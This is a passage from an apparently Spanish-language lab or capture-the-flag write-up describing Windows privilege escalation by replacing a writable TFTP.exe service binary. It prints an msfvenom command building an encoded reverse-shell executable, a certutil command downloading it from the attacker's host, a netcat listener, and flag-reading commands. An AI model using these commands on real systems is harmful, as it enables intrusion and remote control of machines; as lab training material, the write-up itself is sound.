Como tenemos permisos para poder modificar el fichero, creamos un fichero llamado `TFTP.exe` con `msfvenom` que contenga nuestra reverse shell y posteriormente lo sustituiremos por el que se encuentra en el sistema.

```
msfvenom -p windows/x64/powershell_reverse_tcp LHOST=192.168.45.5 LPORT=80 -f exe -a x64 --platform windows -b '\x00' -e x64\xor_dynamic -o TFTP.exe
```

<figure><img src="https://940481291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFPk1C70Fp5SRurFLmfzj%2Fuploads%2FdGsMws0orH0i4dQmnXwt%2FPasted%20image%2020230304234405.png?alt=media&#x26;token=8c68a613-aaa5-4b88-b510-32c148feb914" alt=""><figcaption></figcaption></figure>

### Sustitución y subida del binario malicioso

En la máquina de la víctima, renombramos el fichero `TFTP.exe` a `TFTP.exe.bak` para no eliminarlo y descargamos nuestro EXE malicioso.

```
move TFTP.exe TFTP.exe.bak
certutil.exe -urlcache -split -f "http://192.168.45.5/TFTP.exe"
```

<figure><img src="https://940481291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFPk1C70Fp5SRurFLmfzj%2Fuploads%2FVsAzptT3AQrKPLoGHKa6%2FPasted%20image%2020230304234529.png?alt=media&#x26;token=d8bf58f4-47ae-4631-8c21-eb13c72d39d7" alt=""><figcaption></figcaption></figure>

Recordamos cerrar nuestro `python` que se encuentra con el servicio HTTP para la descarga del EXE. Y ponemos el puerto 80 a la escucha para obtener nuestra shell:

```
sudo rlwrap nc -lnvp 80
```

Esperamos 5 minutos y... PWNED!

<figure><img src="https://940481291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFPk1C70Fp5SRurFLmfzj%2Fuploads%2FSSnTsleDMC79txdfPNoq%2FPasted%20image%2020230304235043.png?alt=media&#x26;token=a93e65cc-1459-4c2c-9315-2632e7eec478" alt=""><figcaption></figcaption></figure>

```
type C:\Users\rupert\Desktop\local.txt
type C:\Users\Administrator\Desktop\proof.txt
```